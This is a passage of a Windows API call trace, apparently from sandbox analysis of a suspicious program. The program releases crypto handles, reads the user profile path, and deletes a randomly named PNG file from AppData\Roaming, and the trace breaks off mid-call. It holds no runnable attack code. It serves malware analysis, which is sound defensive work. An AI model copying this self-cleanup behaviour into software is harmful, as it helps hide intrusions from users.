[0149.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa300, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.634] CryptDestroyKey (hKey=0x9e1b38) returned 1 [0149.634] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.634] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.634] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.634] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.634] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.634] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.634] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.634] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.634] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.634] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.634] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.635] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.635] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.635] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.635] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.635] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.635] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.635] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.635] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.635] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.635] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.635] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.635] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.636] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.636] CryptReleaseContext (hProv=0x9bf088, dwFlags=0x0) returned 1 [0149.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.636] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.636] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.637] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.637] CloseHandle (hObject=0x4ec) returned 1 [0149.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.638] CloseHandle (hObject=0x4fc) returned 1 [0149.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.645] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.645] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.645] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x68) returned 0x2a68440 [0149.646] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PN5TTWYWv642BYt.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png", lpFilePart=0x8cedf4*="PN5TTWYWv642BYt.png") returned 0x33 [0149.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.646] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pn5ttwywv642byt.png")) returned 0x20 [0149.646] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6602990, ftCreationTime.dwHighDateTime=0x1d5ca1f, ftLastAccessTime.dwLowDateTime=0x65ec1cd0, ftLastAccessTime.dwHighDateTime=0x1d5cd53, ftLastWriteTime.dwLowDateTime=0x65ec1cd0, ftLastWriteTime.dwHighDateTime=0x1d5cd53, nFileSizeHigh=0x0, nFileSizeLow=0x17b50, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="PN5TTWYWv642BYt.png", cAlternateFileName="PN5TTW~1.PNG")) returned 0x9e21f8 [0149.647] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pn5ttwywv642byt.png")) returned 1 [0149.652] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6602990, ftCreationTime.dwHighDateTime=0x1d5ca1f, ftLastAccessTime.dwLowDateTime=0x65ec1cd0, ftLastAccessTime.dwHighDateTime=0x1d5cd53, ftLastWriteTime.dwLowDateTime=0x65ec1cd0, ftLastWriteTime.dwHighDateTime=0x1d5cd53, nFileSizeHigh=0x0, nFileSizeLow=0x17b50, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="PN5TTWYWv642BYt.png", cAlternateFileName="PN5TTW~1.PNG")) returned 0 [0149.652] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.653] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0149.653] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.654] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.654] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.654] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0149.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0149.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x68) returned 0x2a68440 [0149.666] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PN5TTWYWv642BYt.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png", lpFilePart=0x8cf650*="PN5TTWYWv642BYt.png") returned 0x33 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.666] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\PN5TTWYWv642BYt.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pn5ttwywv642byt.png")) returned 0xffffffff [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.666] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0149.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 